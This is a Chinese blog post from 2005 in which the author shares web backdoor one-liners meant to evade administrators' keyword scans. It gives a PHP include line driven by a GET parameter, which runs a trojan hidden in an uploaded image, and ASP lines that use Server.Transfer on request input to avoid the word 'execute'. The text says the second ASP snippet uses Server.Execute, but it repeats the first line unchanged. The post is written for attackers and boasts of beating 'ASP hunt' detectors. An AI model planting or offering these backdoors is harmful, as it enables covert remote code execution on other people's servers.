高阁客竟去·小园花乱飞·参差连曲陌·迢递送斜晖http://blog.yesky.com/Blog/wjswsl/复制地址
控制面板
日历
<2008年9月>
SuMoTuWeThFrSa
31123456
78910111213
14151617181920
21222324252627
2829301234
567891011
留言簿(49)
文章档案
以前用过PHP的后门,都被查的差不多.管理员有的时候很变态,去查一些特别的比如eval等等,我上一次心爱的小马就这么挂掉了.555555.所以我就想到了Phpwind的那个文件包含漏洞.然后再一想,对呵....可以当后门嘛....于是就出来了

很多论坛是可以支持上传文件的功能的,所以有的时候我们上传一个包含木马的图片,再就是可以使用下面的代码来那个哪个.......
程序代码:
<?@include($_GET['kEvin1986']);?>

不规范的写法是
程序代码:
<?@include($kEvin1986);?>


比那些管理员没事情去查eval要好多了

而我又想到了另外一种ASP下的方法,也是简单明了,而且可以避开execute这个词

程序代码:
<%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%>


如果要用Server.Execuet的话就
程序代码:
<%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%>


恩.现在就不怕那些什么ASP追捕了....
posted on 2005-03-31 09:09 心海箫音 阅读(79) 评论(0)  编辑 报警

Feedbac

相关内容
文章评论

暂无人对此文章发表评论!

发表评论
标题 *  
姓名 *  
内容 *  
   验证码: *       
       
版权声明:天极是本Blog托管服务提供商。如本文牵涉版权问题,天极不承担相关责任,请版权拥有者直接与文章作者联系解决。
Powered by:

Copyright © 警者自警